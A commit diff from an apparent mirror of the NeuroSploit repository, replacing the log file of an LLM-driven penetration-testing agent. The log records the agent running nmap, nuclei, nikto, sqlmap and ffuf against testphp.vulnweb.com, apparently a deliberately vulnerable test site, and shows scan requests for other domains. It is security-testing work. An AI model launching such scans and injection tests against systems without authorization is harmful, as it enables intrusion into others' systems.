CalvinBackup/NeuroSploit
1
0
Fork 0
mirror of https://github.com/CyberSecurityUP/NeuroSploit.git synced 2026-02-12 14:02:45 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Joas A Santos
2026-01-09 22:48:39 -03:00
committed by GitHub
parent a3b58f8b5c
commit d5899c19f4
11 changed files with 5261 additions and 383 deletions
Download Patch File Download Diff File Expand all files Collapse all files

518
logs/neurosploit.log
View File

@@ -1,251 +1,267 @@
2025-12-19 11:32:18,555 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113218 2026-01-09 14:50:31,946 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145031
2025-12-19 11:32:55,262 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113255 2026-01-09 14:54:04,860 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145404
2025-12-19 11:33:54,241 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113354 2026-01-09 14:54:10,914 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145410
2025-12-19 11:34:29,519 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113429 2026-01-09 14:54:23,986 - __main__ - INFO - Tools configuration updated
2025-12-19 11:35:39,664 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113539 2026-01-09 14:54:29,502 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145429
2025-12-19 11:35:39,664 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 14:54:38,874 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145438
2025-12-19 11:35:39,666 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 14:54:59,563 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145459
2025-12-19 11:35:39,668 - core.llm_manager - INFO - Loaded 8 prompts from Markdown library. 2026-01-09 14:55:18,292 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145518
2025-12-19 11:35:39,668 - core.llm_manager - INFO - Initialized LLM Manager - Provider: gemini, Model: gemini-pro, Profile: gemini_pro_default 2026-01-09 14:55:41,508 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145541
2025-12-19 11:35:39,668 - __main__ - ERROR - Prompts for agent role 'owasp_expert' not found in MD library. 2026-01-09 14:56:11,734 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145611
2025-12-19 11:37:59,476 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113759 2026-01-09 14:56:11,735 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 11:38:04,329 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113804 2026-01-09 14:56:11,735 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 11:38:04,329 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 14:56:11,737 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 11:38:04,330 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 14:56:11,737 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default
2025-12-19 11:38:04,331 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 14:56:11,737 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools.
2025-12-19 11:38:04,331 - core.llm_manager - INFO - Initialized LLM Manager - Provider: gemini, Model: gemini-pro, Profile: gemini_pro_default 2026-01-09 14:56:11,737 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: Analyze and finding XSS and SQL Injection vuln in ...
2025-12-19 11:38:04,331 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 14:56:28,803 - __main__ - INFO - Results saved to results/campaign_20260109_145611.json
2025-12-19 11:38:04,331 - agents.base_agent - INFO - Executing owasp_expert agent for input: Realize um teste no site http://testphp.vulnweb.co... 2026-01-09 14:56:28,808 - __main__ - INFO - Report generated: reports/report_20260109_145611.html
2025-12-19 11:38:04,331 - agents.base_agent - ERROR - Missing key in prompt template for owasp_expert: 'web_app_details_json'. Falling back to basic prompt. 2026-01-09 14:58:00,149 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_145800
2025-12-19 11:38:13,483 - core.llm_manager - ERROR - Error generating raw response: 2026-01-09 14:58:00,150 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
No API_KEY or ADC found. Please either: 2026-01-09 14:58:00,150 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
- Set the `GOOGLE_API_KEY` environment variable. 2026-01-09 14:58:00,152 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
- Manually pass the key with `genai.configure(api_key=my_api_key)`. 2026-01-09 14:58:00,152 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: lazarevtill/Llama-3-WhiteRabbitNeo-8B-v2.0:q4_0, Profile: ollama_whiterabbit
- Or set up Application Default Credentials, see https://ai.google.dev/gemini-api/docs/oauth for more information. 2026-01-09 14:58:00,152 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools.
2025-12-19 11:38:13,484 - __main__ - INFO - Results saved to results/campaign_20251219_113804.json 2026-01-09 14:58:00,153 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: Analyze and finding XSS and SQL Injection vuln in ...
2025-12-19 11:38:13,484 - __main__ - INFO - Report generated: reports/report_20251219_113804.html 2026-01-09 14:59:58,160 - __main__ - INFO - Results saved to results/campaign_20260109_145800.json
2025-12-19 11:38:40,109 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113840 2026-01-09 14:59:58,169 - __main__ - INFO - Report generated: reports/report_20260109_145800.html
2025-12-19 11:38:40,109 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 15:07:09,565 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_150709
2025-12-19 11:38:40,109 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 15:07:09,565 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 11:38:40,110 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 15:07:09,566 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 11:38:40,110 - core.llm_manager - INFO - Initialized LLM Manager - Provider: gemini, Model: gemini-pro, Profile: gemini_pro_default 2026-01-09 15:07:09,568 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 11:38:40,110 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 15:07:09,568 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: lazarevtill/Llama-3-WhiteRabbitNeo-8B-v2.0:q4_0, Profile: ollama_whiterabbit
2025-12-19 11:38:40,110 - agents.base_agent - INFO - Executing owasp_expert agent for input: Realize um teste no site http://testphp.vulnweb.co... 2026-01-09 15:07:09,568 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools.
2025-12-19 11:38:49,301 - core.llm_manager - ERROR - Error generating raw response: 2026-01-09 15:07:09,568 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: Analyze and finding XSS and SQL Injection vuln in ...
No API_KEY or ADC found. Please either: 2026-01-09 15:07:09,568 - agents.base_agent - INFO - Executing: /usr/bin/nmap -sV -sC -p 1-1000 --open testphp.vulnweb.com
- Set the `GOOGLE_API_KEY` environment variable. 2026-01-09 15:07:09,570 - agents.base_agent - ERROR - Error executing nmap: [Errno 2] No such file or directory: '/usr/bin/nmap'
- Manually pass the key with `genai.configure(api_key=my_api_key)`. 2026-01-09 15:07:09,570 - agents.base_agent - INFO - Executing: /usr/bin/curl -s -I -k http://testphp.vulnweb.com/
- Or set up Application Default Credentials, see https://ai.google.dev/gemini-api/docs/oauth for more information. 2026-01-09 15:07:10,603 - agents.base_agent - INFO - Executing: /usr/local/bin/nuclei -u http://testphp.vulnweb.com/ -silent -nc
2025-12-19 11:38:49,301 - __main__ - INFO - Results saved to results/campaign_20251219_113840.json 2026-01-09 15:11:16,445 - agents.base_agent - INFO - Executing: /usr/bin/nikto -h http://testphp.vulnweb.com/ -nointeractive
2025-12-19 11:38:49,302 - __main__ - INFO - Report generated: reports/report_20251219_113840.html 2026-01-09 15:11:16,447 - agents.base_agent - ERROR - Error executing nikto: [Errno 2] No such file or directory: '/usr/bin/nikto'
2025-12-19 11:39:42,429 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_113942 2026-01-09 15:11:16,447 - agents.base_agent - INFO - Executing: /usr/local/bin/sqlmap -u http://testphp.vulnweb.com/ --batch --level=2 --risk=2 --random-agent --threads=3
2025-12-19 11:39:42,430 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 15:11:18,050 - agents.base_agent - INFO - Executing: /usr/bin/ffuf -u http://testphp.vulnweb.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,301,302,403 -t 50
2025-12-19 11:39:42,430 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 15:11:18,051 - agents.base_agent - ERROR - Error executing ffuf: [Errno 2] No such file or directory: '/usr/bin/ffuf'
2025-12-19 11:39:42,430 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 15:11:40,036 - __main__ - INFO - Results saved to results/campaign_20260109_150709.json
2025-12-19 11:39:42,430 - core.llm_manager - INFO - Initialized LLM Manager - Provider: gemini, Model: gemini-pro, Profile: gemini_pro_default 2026-01-09 15:11:40,039 - __main__ - INFO - Report generated: reports/report_20260109_150709.html
2025-12-19 11:39:42,430 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 15:17:31,641 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_151731
2025-12-19 11:39:42,430 - agents.base_agent - INFO - Executing owasp_expert agent for input: Realize um teste no site http://testphp.vulnweb.co... 2026-01-09 15:17:38,401 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_151738
2025-12-19 11:39:51,400 - core.llm_manager - ERROR - Error generating raw response: 2026-01-09 15:17:42,099 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_151742
No API_KEY or ADC found. Please either: 2026-01-09 15:18:09,938 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_151809
- Set the `GOOGLE_API_KEY` environment variable. 2026-01-09 15:19:08,248 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
- Manually pass the key with `genai.configure(api_key=my_api_key)`. 2026-01-09 15:19:08,251 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
- Or set up Application Default Credentials, see https://ai.google.dev/gemini-api/docs/oauth for more information. 2026-01-09 15:19:08,254 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 11:39:51,401 - __main__ - INFO - Results saved to results/campaign_20251219_113942.json 2026-01-09 15:19:08,254 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-3-opus-20240229, Profile: claude_opus_default
2025-12-19 11:39:51,402 - __main__ - INFO - Report generated: reports/report_20251219_113942.html 2026-01-09 15:19:08,254 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools.
2025-12-19 11:40:25,811 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_114025 2026-01-09 15:19:08,254 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: target http://testphp.vulnweb.com/listproducts.php...
2025-12-19 11:44:45,527 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_114445 2026-01-09 15:19:08,254 - agents.base_agent - INFO - Executing: /usr/bin/nmap -sV -sC -p 1-1000 --open testphp.vulnweb.com
2025-12-19 11:45:10,765 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_114510 2026-01-09 15:19:08,256 - agents.base_agent - ERROR - Error executing nmap: [Errno 2] No such file or directory: '/usr/bin/nmap'
2025-12-19 11:45:21,124 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_114521 2026-01-09 15:19:08,256 - agents.base_agent - INFO - Executing: /usr/bin/curl -s -I -k http://testphp.vulnweb.com/listproducts.php
2025-12-19 11:46:17,722 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_114617 2026-01-09 15:19:08,707 - agents.base_agent - INFO - Executing: /usr/local/bin/nuclei -u http://testphp.vulnweb.com/listproducts.php -silent -nc
2025-12-19 11:47:37,765 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 15:22:18,265 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_152218
2025-12-19 11:47:37,766 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 15:22:18,265 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 11:47:37,770 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 15:22:18,265 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 11:47:37,770 - core.llm_manager - INFO - Initialized LLM Manager - Provider: gemini, Model: gemini-pro, Profile: gemini_pro_default 2026-01-09 15:22:18,268 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 11:47:37,770 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 15:22:18,268 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: lazarevtill/Llama-3-WhiteRabbitNeo-8B-v2.0:q4_0, Profile: ollama_whiterabbit
2025-12-19 11:47:37,770 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan http://testphp.vulnweb.com/... 2026-01-09 15:22:18,268 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools.
2025-12-19 11:47:47,262 - core.llm_manager - ERROR - Error generating raw response: 2026-01-09 15:22:18,268 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: Test http://testphp.vulnweb.com/...
No API_KEY or ADC found. Please either: 2026-01-09 15:22:18,268 - agents.base_agent - INFO - Executing: /usr/bin/nmap -sV -sC -p 1-1000 --open testphp.vulnweb.com
- Set the `GOOGLE_API_KEY` environment variable. 2026-01-09 15:22:18,269 - agents.base_agent - ERROR - Error executing nmap: [Errno 2] No such file or directory: '/usr/bin/nmap'
- Manually pass the key with `genai.configure(api_key=my_api_key)`. 2026-01-09 15:22:18,270 - agents.base_agent - INFO - Executing: /usr/bin/curl -s -I -k http://testphp.vulnweb.com/
- Or set up Application Default Credentials, see https://ai.google.dev/gemini-api/docs/oauth for more information. 2026-01-09 15:22:18,706 - agents.base_agent - INFO - Executing: /usr/local/bin/nuclei -u http://testphp.vulnweb.com/ -silent -nc
2025-12-19 11:47:47,263 - __main__ - INFO - Results saved to results/campaign_20251219_114617.json 2026-01-09 15:22:30,920 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_152230
2025-12-19 11:47:47,263 - __main__ - INFO - Report generated: reports/report_20251219_114617.html 2026-01-09 15:23:10,333 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_152310
2025-12-19 11:49:23,054 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_114923 2026-01-09 15:23:10,333 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 11:49:23,054 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 15:23:10,333 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 11:49:23,054 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 15:23:10,334 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 11:49:23,055 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 15:23:10,334 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-3-opus-20240229, Profile: claude_opus_default
2025-12-19 11:49:23,055 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 15:23:10,334 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent. Description: Focuses on web application vulnerabilities, leveraging recon and exploitation tools.
2025-12-19 11:49:23,055 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 15:23:10,334 - agents.base_agent - INFO - Executing bug_bounty_hunter agent for input: Test http://testphp.vulnweb.com/...
2025-12-19 11:49:23,055 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan example.com... 2026-01-09 15:23:10,334 - agents.base_agent - INFO - Executing: /usr/bin/nmap -sV -sC -p 1-1000 --open testphp.vulnweb.com
2025-12-19 11:49:48,488 - __main__ - INFO - Results saved to results/campaign_20251219_114923.json 2026-01-09 15:23:10,336 - agents.base_agent - ERROR - Error executing nmap: [Errno 2] No such file or directory: '/usr/bin/nmap'
2025-12-19 11:49:48,489 - __main__ - INFO - Report generated: reports/report_20251219_114923.html 2026-01-09 15:23:10,336 - agents.base_agent - INFO - Executing: /usr/bin/curl -s -I -k http://testphp.vulnweb.com/
2025-12-19 11:50:08,882 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115008 2026-01-09 15:23:10,775 - agents.base_agent - INFO - Executing: /usr/local/bin/nuclei -u http://testphp.vulnweb.com/ -silent -nc
2025-12-19 11:50:08,882 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 15:27:15,373 - agents.base_agent - INFO - Executing: /usr/bin/nikto -h http://testphp.vulnweb.com/ -nointeractive
2025-12-19 11:50:08,882 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 15:27:15,374 - agents.base_agent - ERROR - Error executing nikto: [Errno 2] No such file or directory: '/usr/bin/nikto'
2025-12-19 11:50:08,884 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 15:27:15,374 - agents.base_agent - INFO - Executing: /usr/local/bin/sqlmap -u http://testphp.vulnweb.com/ --batch --level=2 --risk=2 --random-agent --threads=3
2025-12-19 11:50:08,884 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 15:27:16,525 - agents.base_agent - INFO - Executing: /usr/bin/ffuf -u http://testphp.vulnweb.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,301,302,403 -t 50
2025-12-19 11:50:08,884 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 15:27:16,526 - agents.base_agent - ERROR - Error executing ffuf: [Errno 2] No such file or directory: '/usr/bin/ffuf'
2025-12-19 11:50:08,884 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan hackersec.com... 2026-01-09 15:27:17,047 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.466394 seconds
2025-12-19 11:50:29,383 - __main__ - INFO - Results saved to results/campaign_20251219_115008.json 2026-01-09 15:27:17,730 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.990376 seconds
2025-12-19 11:50:29,384 - __main__ - INFO - Report generated: reports/report_20251219_115008.html 2026-01-09 15:27:18,981 - core.llm_manager - ERROR - Error generating raw response: Connection error.
2025-12-19 11:56:34,904 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115634 2026-01-09 15:27:18,983 - __main__ - INFO - Results saved to results/campaign_20260109_152310.json
2025-12-19 11:56:34,904 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 15:27:18,985 - __main__ - INFO - Report generated: reports/report_20260109_152310.html
2025-12-19 11:56:34,904 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 15:36:50,249 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_153650
2025-12-19 11:56:34,906 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 15:36:50,249 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 11:56:34,906 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 15:36:50,249 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 11:56:34,906 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 15:36:50,252 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 11:56:34,906 - agents.base_agent - INFO - Executing owasp_expert agent for input: scan hackersec.com... 2026-01-09 15:36:50,252 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-3-opus-20240229, Profile: claude_opus_default
2025-12-19 11:56:54,137 - __main__ - INFO - Results saved to results/campaign_20251219_115634.json 2026-01-09 15:36:50,252 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent
2025-12-19 11:56:54,138 - __main__ - INFO - Report generated: reports/report_20251219_115634.html 2026-01-09 15:39:31,557 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.416288 seconds
2025-12-19 11:57:13,435 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115713 2026-01-09 15:39:32,185 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.975090 seconds
2025-12-19 11:57:13,435 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 15:39:33,424 - core.llm_manager - ERROR - Error generating raw response: Connection error.
2025-12-19 11:57:13,436 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 15:39:33,661 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.494540 seconds
2025-12-19 11:57:13,438 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 15:39:34,487 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.912874 seconds
2025-12-19 11:57:13,438 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 15:39:35,719 - core.llm_manager - ERROR - Error generating raw response: Connection error.
2025-12-19 11:57:13,438 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 15:39:35,721 - __main__ - INFO - Results saved to results/campaign_20260109_153650.json
2025-12-19 11:57:13,438 - agents.base_agent - INFO - Executing owasp_expert agent for input: identifique vulnerabilidades no dominio hackersec.... 2026-01-09 21:21:25,368 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_212125
2025-12-19 11:57:36,170 - __main__ - INFO - Results saved to results/campaign_20251219_115713.json 2026-01-09 21:21:25,368 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 11:57:36,170 - __main__ - INFO - Report generated: reports/report_20251219_115713.html 2026-01-09 21:21:25,368 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 11:57:56,516 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115756 2026-01-09 21:21:25,371 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 11:58:01,802 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115801 2026-01-09 21:21:25,371 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-3-opus-20240229, Profile: claude_opus_default
2025-12-19 11:58:11,144 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115811 2026-01-09 21:21:25,371 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent
2025-12-19 11:58:22,784 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115822 2026-01-09 21:24:15,783 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.470846 seconds
2025-12-19 11:58:51,778 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_115851 2026-01-09 21:24:16,476 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.883909 seconds
2025-12-19 12:02:00,697 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_120200 2026-01-09 21:24:17,587 - core.llm_manager - ERROR - Error generating raw response: Connection error.
2025-12-19 12:02:00,697 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:24:17,806 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.430765 seconds
2025-12-19 12:02:00,697 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:24:18,929 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.832160 seconds
2025-12-19 12:02:00,699 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:24:19,994 - core.llm_manager - ERROR - Error generating raw response: Connection error.
2025-12-19 12:02:00,699 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:24:19,994 - __main__ - INFO - Results saved to results/campaign_20260109_212125.json
2025-12-19 12:02:00,700 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:24:19,997 - __main__ - INFO - Report generated: reports/report_20260109_212125.html
2025-12-19 12:02:00,700 - agents.base_agent - INFO - Executing owasp_expert agent for input: identifique vulnerabilidades no dominio hackersec.... 2026-01-09 21:30:56,421 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20260109_213056
2025-12-19 12:02:24,246 - __main__ - INFO - Results saved to results/campaign_20251219_120200.json 2026-01-09 21:30:56,421 - __main__ - INFO - Starting execution for agent role: bug_bounty_hunter
2025-12-19 12:02:24,247 - __main__ - INFO - Report generated: reports/report_20251219_120200.html 2026-01-09 21:30:56,422 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json
2025-12-19 12:02:39,920 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_120239 2026-01-09 21:30:56,424 - core.llm_manager - INFO - Loaded 12 prompts from Markdown library.
2025-12-19 12:02:39,920 - __main__ - INFO - Starting execution for agent role: owasp_expert_profile 2026-01-09 21:30:56,424 - core.llm_manager - INFO - Initialized LLM Manager - Provider: claude, Model: claude-3-opus-20240229, Profile: claude_opus_default
2025-12-19 12:02:39,920 - __main__ - ERROR - Agent role 'owasp_expert_profile' not found in configuration. 2026-01-09 21:30:56,424 - agents.base_agent - INFO - Initialized bug_bounty_hunter agent
2025-12-19 12:03:53,173 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_120353 2026-01-09 21:32:14,060 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.441367 seconds
2025-12-19 12:03:53,173 - __main__ - INFO - Starting execution for agent role: owasp_expert_profile 2026-01-09 21:32:14,709 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.982832 seconds
2025-12-19 12:03:53,173 - __main__ - ERROR - Agent role 'owasp_expert_profile' not found in configuration. 2026-01-09 21:32:16,630 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.582831 seconds
2025-12-19 12:03:57,672 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_120357 2026-01-09 21:32:18,418 - core.llm_manager - WARNING - Claude API connection error (attempt 1/3): Connection error.
2025-12-19 12:03:57,672 - __main__ - INFO - Starting execution for agent role: owasp_expert 2026-01-09 21:32:18,418 - core.llm_manager - INFO - Retrying in 1.0s...
2025-12-19 12:03:57,673 - core.llm_manager - INFO - Loaded prompts from JSON library: prompts/library.json 2026-01-09 21:32:19,634 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.451210 seconds
2025-12-19 12:03:57,676 - core.llm_manager - INFO - Loaded 9 prompts from Markdown library. 2026-01-09 21:32:20,310 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.839755 seconds
2025-12-19 12:03:57,676 - core.llm_manager - INFO - Initialized LLM Manager - Provider: ollama, Model: llama3:8b, Profile: ollama_llama3_default 2026-01-09 21:32:21,363 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.604430 seconds
2025-12-19 12:03:57,676 - agents.base_agent - INFO - Initialized owasp_expert agent. Description: Specializes in assessing web applications against OWASP Top 10 vulnerabilities. 2026-01-09 21:32:23,171 - core.llm_manager - WARNING - Claude API connection error (attempt 2/3): Connection error.
2025-12-19 12:03:57,676 - agents.base_agent - INFO - Executing owasp_expert agent for input: identifique vulnerabilidades no dominio hackersec.... 2026-01-09 21:32:23,171 - core.llm_manager - INFO - Retrying in 2.0s...
2025-12-19 12:04:20,276 - __main__ - INFO - Results saved to results/campaign_20251219_120357.json 2026-01-09 21:32:25,375 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.467985 seconds
2025-12-19 12:04:20,277 - __main__ - INFO - Report generated: reports/report_20251219_120357.html 2026-01-09 21:32:26,054 - anthropic._base_client - INFO - Retrying request to /v1/messages in 0.900564 seconds
2025-12-19 12:09:45,332 - __main__ - INFO - NeuroSploitv2 initialized - Session: 20251219_120945 2026-01-09 21:32:27,165 - anthropic._base_client - INFO - Retrying request to /v1/messages in 1.518861 seconds
